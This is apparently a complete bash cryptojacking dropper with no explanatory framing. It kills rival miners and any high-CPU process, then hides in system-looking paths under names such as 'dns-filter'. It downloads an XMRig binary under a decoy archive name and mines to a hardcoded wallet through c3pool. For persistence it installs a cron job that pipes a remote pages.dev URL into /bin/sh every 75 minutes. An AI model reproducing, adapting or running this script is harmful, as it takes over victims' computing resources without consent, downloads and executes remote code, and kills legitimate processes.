#!/bin/bash for file in \ "${HOME_1}/systemdev/dns-filter" \ /usr/lib/systemdev/dns-filter \ /usr/lib/dev/systemdev/dns-filter do [ -f "$file" ] && rm -f "$file" done CUSTOM_ARG="${1:-x}" external_ip=$(wget -qO- ipv4.icanhazip.com 2>/dev/null \ || curl -s ipv4.icanhazip.com 2>/dev/null) IDOFPC=$(echo "$external_ip" | sed 's/\./-/g' | cut -c -6) if systemctl is-active --quiet systemd_s; then systemctl stop systemd_s fi kill_unwanted() { if command -v pkill >/dev/null 2>&1; then pkill -f "index.js" pkill "xmr" elif command -v pgrep >/dev/null 2>&1; then pgrep -f "index.js" | xargs -r kill pgrep -x "xmr" | xargs -r kill else ps aux | grep '[x]mr' | awk '{print $2}' | xargs -r kill ps aux | grep -w '[i]ndex.js' | awk '{print $2}' | xargs -r kill fi if command -v pgrep >/dev/null 2>&1; then pgrep "index.js" | grep -v "^$$" | xargs -r kill else ps aux | grep -w '[i]ndex.js' \ | awk -v mypid=$$ '$2 != mypid {print $2}' \ | xargs -r kill fi } kill_unwanted kill_high_cpu_processes() { local threshold=150.0 local exclude_patterns=("pattern2reserve333" "goAwgBCFH") local pid cpu cmdline ps -eo pid,%cpu --sort=-%cpu \ | awk -v threshold="$threshold" 'NR>1 && $2 > threshold {print $1}' \ | while read -r pid; do if [ -f "/proc/$pid/cmdline" ]; then cmdline=$(tr '\0' ' ' < "/proc/$pid/cmdline") else echo "PID $pid died before inspection" continue fi for pattern in "${exclude_patterns[@]}"; do if [[ "$cmdline" == *"$pattern"* ]]; then echo "Excluding PID $pid (matched '$pattern')" continue 2 fi done if kill -9 "$pid" 2>/dev/null; then echo "Killed PID $pid" else echo "Failed to kill PID $pid (already dead or permission denied)" fi done } kill_high_cpu_processes _sfx_path() { if [ "$(id -u)" -eq 0 ]; then printf '/var/lib/.sysconf_id' else printf '%s/.cache/.sysid' "${HOME:-/tmp}" fi } _load_or_gen_sfx() { local _f _s _f=$(_sfx_path) if [ -f "$_f" ] && [ -s "$_f" ]; then cat "$_f" return fi _s=$(tr -dc 'a-z0-9' /dev/null | head -c4) [ -z "$_s" ] && _s=$(awk 'BEGIN{srand(); printf "%04x", int(rand()*65535)}') mkdir -p "$(dirname "$_f")" 2>/dev/null printf '%s' "$_s" >"$_f" 2>/dev/null printf '%s' "$_s" } _SFX=$(_load_or_gen_sfx) if [ "$(id -u)" -eq 0 ]; then HOME_1="/usr_${_SFX}/lib/dev" user_type="root" if ! command -v cron >/dev/null 2>&1; then echo "Installing cron..." if command -v apt-get >/dev/null 2>&1; then apt-get update && apt-get install -y cron elif command -v yum >/dev/null 2>&1; then yum install -y cronie else echo "No package manager found for cron install" fi fi else HOME_1="${HOME:-/tmp}/.usr_${_SFX}/lib" user_type="user" fi mkdir -p "${HOME_1}/systemdev" program_file="$HOME_1/systemdev/dns-filter" MINING_POOL="auto.c3pool.org:443" WALLET="883kAB7UfoJCKPzZAavUCHJdH4L2qVjqw4A79diUrFjBWBFrerhXPFbbUZnY2CemcUiBcLpAUz38vVYBbUqTHAgoAwgBCFH" XMRIG_URL="https://gitlab.com/Kanedias/xmrig-static/-/releases/permalink/latest/downloads/xmrig-x86_64-static" run_program() { local executable="$program_file" local fallback_executable="${HOME_1}/dns-filter" # Returns 0 if the process is still alive after 5 seconds launch_program() { nohup "$@" >/dev/null 2>&1 & local pid=$! sleep 0.5 ps -p "$pid" >/dev/null 2>&1 || return 1 sleep 4.5 ps -p "$pid" >/dev/null 2>&1 } download_fallback() { rm -f "$fallback_executable" if command -v curl >/dev/null 2>&1; then curl -k -fL -o "$fallback_executable" "$XMRIG_URL" || return 1 elif command -v wget >/dev/null 2>&1; then wget -qO "$fallback_executable" "$XMRIG_URL" || return 1 else echo "No download tool available" >&2; return 1 fi chmod +x "$fallback_executable" } echo "Starting primary miner..." if [ -x "$executable" ]; then if launch_program "$executable" -o "$MINING_POOL" -u "$WALLET" -p "$CUSTOM_ARG"; then echo "Primary miner running (PID $!)" return 0 else echo "Primary miner crashed immediately" fi else echo "Primary miner binary not found/executable" fi echo "Attempting fallback download..." if download_fallback && launch_program "$fallback_executable" -o "$MINING_POOL" -u "$WALLET" -p "$CUSTOM_ARG"; then echo "Fallback miner running (PID $!)" else echo "Warning: All startup attempts failed" fi return 0 } if [ -e "$program_file" ]; then echo "Miner binary already present at: $program_file" run_program pkill -f "systemd-t" else echo "Downloading miner binary..." if command -v wget &>/dev/null; then wget -qO "$HOME_1/systemdev/yes.tar.xz" "$XMRIG_URL" elif command -v curl &>/dev/null; then curl -k -L -o "$HOME_1/systemdev/yes.tar.xz" "$XMRIG_URL" else echo "Error: neither wget nor curl available."; exit 1 fi # Binary is saved directly (no actual tar extraction — the .tar.xz name is a decoy) mv "$HOME_1/systemdev/yes.tar.xz" "$program_file" rm -rf "$HOME_1/systemdev/xmrig" chmod +x "$program_file" if [ -x "$program_file" ]; then echo "Miner installed at: $program_file" run_program else echo "Error: install failed at $program_file" echo "Machine: ($external_ip) - $user_type" fi fi create_cronjob() { local url="$1" local cron_command if command -v curl >/dev/null; then cron_command="/bin/sh -c 'curl -fsSLk $url | tr -d '\''\r'\'' | /bin/sh'" elif command -v wget >/dev/null; then cron_command="/bin/sh -c 'wget -qO- $url | tr -d '\''\r'\'' | /bin/sh'" else echo "Error: cannot create cron job."; return 1 fi # Adds entry, deduplicating by URL first (crontab -l 2>/dev/null | grep -vF "$url"; echo "*/75 * * * * $cron_command") | crontab - echo "Cron persistence installed." } create_cronjob "https://redirect-master-pages.pages.dev/mon" rm -f /tmp/mon.sh rm -f /tmp/run.sh delete_systemd_mon_file() { if [ "$(id -u)" -eq 0 ]; then file_path="/usr/lib/systemdev/dns-filter" else file_path="/tmp/usr/lib/systemdev/dns-filter" fi if [ -e "$file_path" ]; then rm "$file_path" echo "File deleted: $file_path" else echo "File does not exist: $file_path" fi }